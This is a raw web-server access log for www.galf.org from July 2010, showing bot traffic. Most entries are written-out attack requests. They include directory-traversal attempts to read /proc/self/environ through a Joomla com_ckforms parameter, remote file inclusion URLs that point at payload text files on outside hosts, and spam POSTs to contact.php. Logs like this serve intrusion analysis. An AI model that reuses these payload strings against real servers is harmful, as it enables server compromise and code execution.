112.104.57.22 - - [25/Jul/2010:20:07:27 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:27 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:29 -0700] "GET /logs/access_100705.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:30 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:07:30 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:41 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:41 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
203.105.83.126 - - [25/Jul/2010:20:07:42 -0700] "GET /logs/access_091214.log%20%20///s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kortech.cn//bbs//images/id1.txt?? HTTP/1.1" 404 - "-" "Jcomers Bot Scan" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
91.137.131.51 - - [25/Jul/2010:20:07:42 -0700] "POST /logs/access_100524.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
188.93.230.150 - - [25/Jul/2010:20:08:46 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
188.93.230.150 - - [25/Jul/2010:20:08:46 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
188.93.230.150 - - [25/Jul/2010:20:08:46 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:54 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:54 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:54 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:08:55 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:10:51 -0700] "POST /logs/access.log/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:10:51 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:10:51 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:11:22 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:11:22 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
64.6.98.41 - - [25/Jul/2010:20:11:22 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:11:42 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:11:42 -0700] "GET /logs/access_100308.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:11:42 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:13:12 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:13:12 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:13:19 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:13:21 -0700] "POST /logs/access_100712.log%20%20//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:13:21 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
113.30.66.24 - - [25/Jul/2010:20:14:36 -0700] "GET /logs/access_100329.log//bemarket/postscript/postscript.php?p_mode=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
113.30.66.24 - - [25/Jul/2010:20:15:15 -0700] "GET /logs/access_100419.log//bemarket/postscript/postscript.php?p_mode=http://kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:17 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:17 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:15:18 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
208.80.193.27 - - [25/Jul/2010:20:15:26 -0700] "GET / HTTP/1.0" 200 1032 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; YComp 5.0.0.0; .NET CLR 1.1.4322)" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:15:26 -0700] "GET /appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:15:26 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:15:27 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:15:31 -0700] "GET /logs/access_100308.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:16:40 -0700] "GET /logs/access_091012.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:18:32 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:18:32 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:18:33 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
212.92.13.125 - - [25/Jul/2010:20:18:33 -0700] "POST /logs/access_090928.log//contact.php HTTP/1.1" 404 - "-" "plaNETWORK Bot Search" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:19:16 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.0" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:19:17 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
89.200.170.85 - - [25/Jul/2010:20:19:17 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "MaMa CaSpEr" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:19:51 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:19:56 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
112.104.57.22 - - [25/Jul/2010:20:19:58 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:20:07 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:20:07 -0700] "POST /logs/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
66.197.186.245 - - [25/Jul/2010:20:20:07 -0700] "POST /logs/access_100712.log%20%20/contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:20:10 -0700] "POST /logs//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:20:11 -0700] "POST /contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
201.232.70.254 - - [25/Jul/2010:20:20:11 -0700] "POST /logs/access.log//contact.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:39 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:39 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:39 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:40 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:40 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:40 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:41 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:41 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:41 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:44 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:44 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:20:44 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:20:20:51 -0700] "GET /appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:20:20:51 -0700] "GET /logs//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.236.43.200 - - [25/Jul/2010:20:20:52 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
83.243.9.110 - - [25/Jul/2010:20:21:25 -0700] "GET /logs/access_100118.log//appserv/main.php?appserv_root=http://www.mln.mlc.edu.tw/appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:21:41 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:21:42 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:21:58 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:21:58 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:01 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /logs/access_100705.log/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:02 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:03 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:29 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:29 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:29 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:22:29 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:19 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:19 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:22 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:22 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:45 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:45 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:48 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:49 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:49 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:23:49 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:05 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:24:22 -0700] "GET /logs//atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:24:22 -0700] "GET /logs/access_100301.log//atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
86.109.96.188 - - [25/Jul/2010:20:24:22 -0700] "GET /atom.php5?page=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:25 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:28 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:24:38 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
188.127.248.175 - - [25/Jul/2010:20:24:43 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:44 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7659 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:44 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:47 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:48 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
89.200.169.163 - - [25/Jul/2010:20:24:56 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1048 "-" "libwww-perl/5.813" "www.galf.org"
